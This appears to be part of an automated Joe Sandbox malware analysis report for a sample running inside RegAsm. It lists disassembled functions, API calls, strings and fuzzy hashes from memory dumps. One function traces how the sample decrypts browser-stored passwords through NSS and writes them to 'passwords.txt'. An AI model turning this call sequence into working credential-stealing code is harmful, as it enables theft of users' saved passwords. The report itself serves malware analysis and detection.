Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58

Function 004014A2 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 0040DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,76885460,?,00000000), ref: 0040DBBB
Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD

GetProcessHeap.KERNEL32(00000008,?,76885460,?,00000000), ref: 0040DD04
HeapAlloc.KERNEL32(00000000), ref: 0040DD0B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD20
HeapFree.KERNEL32(00000000), ref: 0040DD27
strcpy_s.MSVCRT ref: 0040DD43
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD55
HeapFree.KERNEL32(00000000), ref: 0040DD62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DD93
HeapFree.KERNEL32(00000000), ref: 0040DD9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DDA1
HeapAlloc.KERNEL32(00000000), ref: 0040DDA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDBD
HeapFree.KERNEL32(00000000), ref: 0040DDC4
strcpy_s.MSVCRT ref: 0040DDDA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDEC
HeapFree.KERNEL32(00000000), ref: 0040DDF3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE11
HeapFree.KERNEL32(00000000), ref: 0040DE18
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE1F
HeapAlloc.KERNEL32(00000000), ref: 0040DE26
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE3B
HeapFree.KERNEL32(00000000), ref: 0040DE42
strcpy_s.MSVCRT ref: 0040DE52
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE64
HeapFree.KERNEL32(00000000), ref: 0040DE6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE93
HeapFree.KERNEL32(00000000), ref: 0040DE9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DEA1
HeapAlloc.KERNEL32(00000000), ref: 0040DEA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEC3
HeapFree.KERNEL32(00000000), ref: 0040DECA
strcpy_s.MSVCRT ref: 0040DEDD
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEEF
HeapFree.KERNEL32(00000000), ref: 0040DEF6
lstrlenA.KERNEL32(00000000), ref: 0040DEFF
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DF15
HeapAlloc.KERNEL32(00000000), ref: 0040DF1C
lstrlenA.KERNEL32(00000000), ref: 0040DF34

Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

strcpy_s.MSVCRT ref: 0040DF75
GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0040DF9B
HeapFree.KERNEL32(00000000), ref: 0040DFA8
lstrlenA.KERNEL32(?), ref: 0040DFAD
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040DFBC
HeapAlloc.KERNEL32(00000000), ref: 0040DFC3
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFD7
HeapFree.KERNEL32(00000000), ref: 0040DFDE
strcpy_s.MSVCRT ref: 0040DFEC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFF9
HeapFree.KERNEL32(00000000), ref: 0040E000
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E035
HeapFree.KERNEL32(00000000), ref: 0040E03C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040E043
HeapAlloc.KERNEL32(00000000), ref: 0040E04A
strcpy_s.MSVCRT ref: 0040E065
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E077
HeapFree.KERNEL32(00000000), ref: 0040E07E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E122
HeapFree.KERNEL32(00000000), ref: 0040E129
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E173
HeapFree.KERNEL32(00000000), ref: 0040E17A

Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
Part of subcall function 0040DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
Part of subcall function 0040DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
String ID:
API String ID: 838878465-0
Opcode ID: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction ID: 0a8d11442738e0aebf2a58bd4f58ea1ebce0464b8d6fd0751a66cb0fe0de1c79
Opcode Fuzzy Hash: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction Fuzzy Hash: F0E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54

Function 6CA61D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CA61D46), ref: 6CA62345

Strings

CKR_PIN_EXPIRED, xrefs: 6CA6206B
CKR_OPERATION_ACTIVE, xrefs: 6CA622B8
CKR_DEVICE_ERROR, xrefs: 6CA6229D
CKR_OPERATION_CANCEL_FAILED, xrefs: 6CA61F77
CKR_TOKEN_NOT_PRESENT, xrefs: 6CA61F81
CKR_NEW_PIN_MODE, xrefs: 6CA61E9F
CKR_TEMPLATE_INCOMPLETE, xrefs: 6CA61F95
CKR_CURVE_NOT_SUPPORTED, xrefs: 6CA62179
CKR_TEMPLATE_INCONSISTENT, xrefs: 6CA61EE1
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6CA6227F
CKR_INFORMATION_SENSITIVE, xrefs: 6CA622B1
CKR_SIGNATURE_INVALID, xrefs: 6CA620CF
rv = 0x%x, xrefs: 6CA62312
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6CA62015
CKR_OBJECT_HANDLE_INVALID, xrefs: 6CA6204D
CKR_MUTEX_NOT_LOCKED, xrefs: 6CA62225
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6CA62327
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6CA62275
CKR_BUFFER_TOO_SMALL, xrefs: 6CA62183
CKR_STATE_UNSAVEABLE, xrefs: 6CA62037
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6CA6226B
CKR_PIN_LEN_RANGE, xrefs: 6CA62061
rv = %s, xrefs: 6CA62340
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6CA61F0F
CKR_FUNCTION_REJECTED, xrefs: 6CA62289
CKR_MUTEX_BAD, xrefs: 6CA61F49
CKR_SAVED_STATE_INVALID, xrefs: 6CA61E56
CKR_SIGNATURE_LEN_RANGE, xrefs: 6CA620D9
CKR_PIN_INVALID, xrefs: 6CA62057
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6CA62320
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6CA62319
CKR_WRAPPED_KEY_INVALID, xrefs: 6CA61FB5
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6CA6232E
CKR_PIN_LOCKED, xrefs: 6CA62075
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6CA61DE0
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6CA61F8B
CKR_PIN_INCORRECT, xrefs: 6CA61D92
CKR_NEXT_OTP, xrefs: 6CA6222F
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6CA6218D
CKR_DEVICE_REMOVED, xrefs: 6CA62261
CKR_RANDOM_NO_RNG, xrefs: 6CA622A7
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6CA622FF
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6CA61FD7
CKR_FUNCTION_CANCELED, xrefs: 6CA61E73
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6CA62293, 6CA6233F
CKR_DEVICE_MEMORY, xrefs: 6CA61FF3
CKR_OK, xrefs: 6CA61DFC

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 2328f4a829a94386124ac0f94685f08d476ae6492c88ff210b5c9746fe8ddba5
Instruction ID: 673147abc81c4d4c2f4ce585fc124ea6e1a6cb8c4aeccf4af2b801684b5b0148
Opcode Fuzzy Hash: 2328f4a829a94386124ac0f94685f08d476ae6492c88ff210b5c9746fe8ddba5
Instruction Fuzzy Hash: 56610030A8D0C5C6E63C4D5F81AD3BC3124A702305F689377EAA18FE90D795CAC647A7

Function 6CA95DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CA95E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA95E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CA95E5C
free.MOZGLUE(00000000), ref: 6CA95E7E
free.MOZGLUE(00000000), ref: 6CA95E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6CA95EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CA95EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA95ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CA95EF0
free.MOZGLUE(00000000), ref: 6CA95F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA95F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CA95F5B
free.MOZGLUE(00000000), ref: 6CA95F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CA95FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CA95FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CA95FC4
free.MOZGLUE(00000000), ref: 6CA95FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CA95FE9
free.MOZGLUE(00000000), ref: 6CA95FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CA9600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA96027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CA9605A
PR_smprintf.NSS3(6CB6AAF9,00000000), ref: 6CA9606A
free.MOZGLUE(00000000), ref: 6CA9607C
free.MOZGLUE(00000000), ref: 6CA9609A
free.MOZGLUE(00000000), ref: 6CA960B2
free.MOZGLUE(?), ref: 6CA960CE

Strings

noModDB, xrefs: 6CA95EEA
flags, xrefs: 6CA95E3A, 6CA95EC6, 6CA95F30
secmod=, xrefs: 6CA95FB1
secmod.db, xrefs: 6CA95EA0
configDir=, xrefs: 6CA95F9D
forceSecmodChoice, xrefs: 6CA95F55
%s/%s, xrefs: 6CA96055
readOnly, xrefs: 6CA95E56
pkcs11.txt, xrefs: 6CA95F47, 6CA95F7C, 6CA9603A, 6CA96053

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 907fcbc64d7bd2d7aafae2d879040ea498eb3c80b84e029b9e07b5a97f2dfaac
Instruction ID: 6e5113acce7719bf917095bb33138b581ae68e4f96ef0cd44b348f0804ca8041
Opcode Fuzzy Hash: 907fcbc64d7bd2d7aafae2d879040ea498eb3c80b84e029b9e07b5a97f2dfaac
Instruction Fuzzy Hash: 3D91D4F49142415BEF018F25DC83BAA3BF49F06259F1C0160EC5A9BB42E736D989C7A2

Function 0040A916 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A922

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004373A4,0043680F), ref: 0040A9C1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9D9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9E1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9ED
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA09
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA15
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA1C
StrStrA.SHLWAPI(0040B824,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA2D
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA47
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA5A
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA64
lstrcatA.KERNEL32(00000000,004373A8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA70
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA7A
lstrcatA.KERNEL32(00000000,004373AC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA86
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA93
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA9B
lstrcatA.KERNEL32(00000000,004373B0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAA7
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAB7
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAC7
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AADA

Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
Part of subcall function 0040A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
Part of subcall function 0040A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
Part of subcall function 0040A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
Part of subcall function 0040A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
Part of subcall function 0040A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
Part of subcall function 0040A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAE9
lstrcatA.KERNEL32(00000000,004373B4,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAF5
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB05
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB15
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB28

Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB37
lstrcatA.KERNEL32(00000000,004373B8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB43
lstrcatA.KERNEL32(00000000,004373BC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB4F
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB5F
lstrlenA.KERNEL32(00000000), ref: 0040AB7D
CloseHandle.KERNEL32(?), ref: 0040ABAC
NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040ABB2

Strings

passwords.txt, xrefs: 0040AB89
pe, xrefs: 0040A931

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
String ID: passwords.txt$pe
API String ID: 2725232238-1761351166
Opcode ID: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction ID: 1a907496ddc9cbec6b75df531e31c39fb9952b717cdae40389231e62c8e49acd
Opcode Fuzzy Hash: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction Fuzzy Hash: DF71A331500215ABCF15EFA1DD4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6

Function 6CA21D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6CA21DA3

Part of subcall function 6CAF98D0: calloc.MOZGLUE(00000001,00000084,6CA20936,00000001,?,6CA2102C), ref: 6CAF98E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CA21DB2

Part of subcall function 6CA21240: TlsGetValue.KERNEL32(00000040,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA21267
Part of subcall function 6CA21240: EnterCriticalSection.KERNEL32(?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA2127C
Part of subcall function 6CA21240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA21291
Part of subcall function 6CA21240: PR_Unlock.NSS3(?,?,?,?,6CA2116C,NSPR_LOG_MODULES), ref: 6CA212A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA21DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CA21E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CA21EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CA21ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CA21EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CA21F17
